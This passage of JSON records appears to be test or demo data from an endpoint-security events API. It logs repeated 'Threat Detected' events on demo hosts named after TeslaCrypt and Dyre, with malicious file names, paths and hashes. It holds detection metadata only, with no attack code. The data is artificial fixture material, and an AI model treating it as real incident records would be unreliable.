Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196244","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":178000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196243","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":147000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196242","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196241","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251512150196000,"timestamp":1610705858,"timestamp_nanoseconds":69000000,"date":"2021-01-15T10:17:38+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251512150196240","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259080131183000,"timestamp":1610705857,"timestamp_nanoseconds":996000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259080131182683","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":944000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6159251507855228943","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251507855229000,"timestamp":1610705857,"timestamp_nanoseconds":8000000,"date":"2021-01-15T10:17:37+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261641","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":821000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261640","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261639","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":758000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261638","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":680000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261637","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"rjtsbks.exe","file_path":"\\\\?\\C:\\Users\\Administrator\\AppData\\Roaming\\rjtsbks.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":2712,"disposition":"Malicious","file_name":"t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":665000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261636","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251503560262000,"timestamp":1610705856,"timestamp_nanoseconds":509000000,"date":"2021-01-15T10:17:36+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251503560261635","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176259028591575000,"timestamp":1610705845,"timestamp_nanoseconds":984000000,"date":"2021-01-15T10:17:25+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176259028591575130","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6159251439135752000,"timestamp":1610705841,"timestamp_nanoseconds":455000000,"date":"2021-01-15T10:17:21+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.3372C1EDAB-100.SBX.TG","detection_id":"6159251439135752194","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_TeslaCrypt","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"90:61:b5:c9:13:79"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"t.exe","file_path":"\\\\?\\C:\\t.exe","identity":{"sha256":"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370","sha1":"e654d39cd13414b5151e8cf0d8f5b166dddd45cb","md5":"209a288c68207d57e0ce6e60ebf60729"},"parent":{"process_id":3164,"disposition":"Clean","file_name":"explorer.exe","identity":{"sha256":"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad","sha1":"cea0890d4b99bae3f635a16dae71f69d137027b9","md5":"8b88ebbb05a0e56b7dcc708498c02b3e"}}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258981346935000,"timestamp":1610705834,"timestamp_nanoseconds":346000000,"date":"2021-01-15T10:17:14+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258981346934873","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6176258929807327000,"timestamp":1610705822,"timestamp_nanoseconds":334000000,"date":"2021-01-15T10:17:02+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"GenericKD:Dyreza-tpd","detection_id":"6176258929807327320","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_Dyre","external_ip":"81.2.69.144","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"23:d5:92:eb:f8:9b"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"webinstall.exe","file_path":"C:\\Users\\ADMINI~1\\AppData\\Local\\Temp\\webinstall.exe","identity":{"sha256":"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc","sha1":"ec80314ae4a2817be806b7ae27dbdb31a88226a0","md5":"e9d8c15e7d18678dd41771f72ed6693c"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":470000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542427","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":112000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542426","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533668103677542000,"timestamp":1610705695,"timestamp_nanoseconds":71000000,"date":"2021-01-15T10:14:55+00:00","event_type":"Threat 
Detected","event_type_id":1090519054,"detection":"W32.File.MalParent","detection_id":"6533668103677542425","connector_guid":"test_connector_guid","group_guids":["test_group_guid"],"severity":"Medium","computer":{"connector_guid":"test_connector_guid","hostname":"Demo_AMP_Threat_Audit","external_ip":"81.2.69.144","user":"user@testdomain.com","active":true,"network_addresses":[{"ip":"10.10.10.10","mac":"63:5f:47:2b:89:91"}],"links":{"computer":"https://api.eu.amp.cisco.com/v1/computers/test_computer","trajectory":"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory","group":"https://api.eu.amp.cisco.com/v1/groups/test_group"}},"file":{"disposition":"Malicious","file_name":"ekjrngjker.exe","file_path":"\\\\?\\C:\\ekjrngjker.exe","identity":{"sha256":"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967","sha1":"b024546a49bad1bd60fccef0a5d11b55f9a442c4","md5":"b99e0a8c56f963246b6464b9fffbf7a2"}}}} +{"version":"v1.2.0","metadata":{"links":{"self":"https://api.eu.amp.cisco.com/v1/events?limit=500","next":"https://api.eu.amp.cisco.com/v1/events?limit=500&offset=500"},"results":{"total":972,"current_item_count":500,"index":0,"items_per_page":500}},"data":{"id":6533667841684537000,"timestamp":1610705634,"timestamp_nanoseconds":532000000,"date":"2021-01-15T10:13:54+00:00","event_type":"Threat 
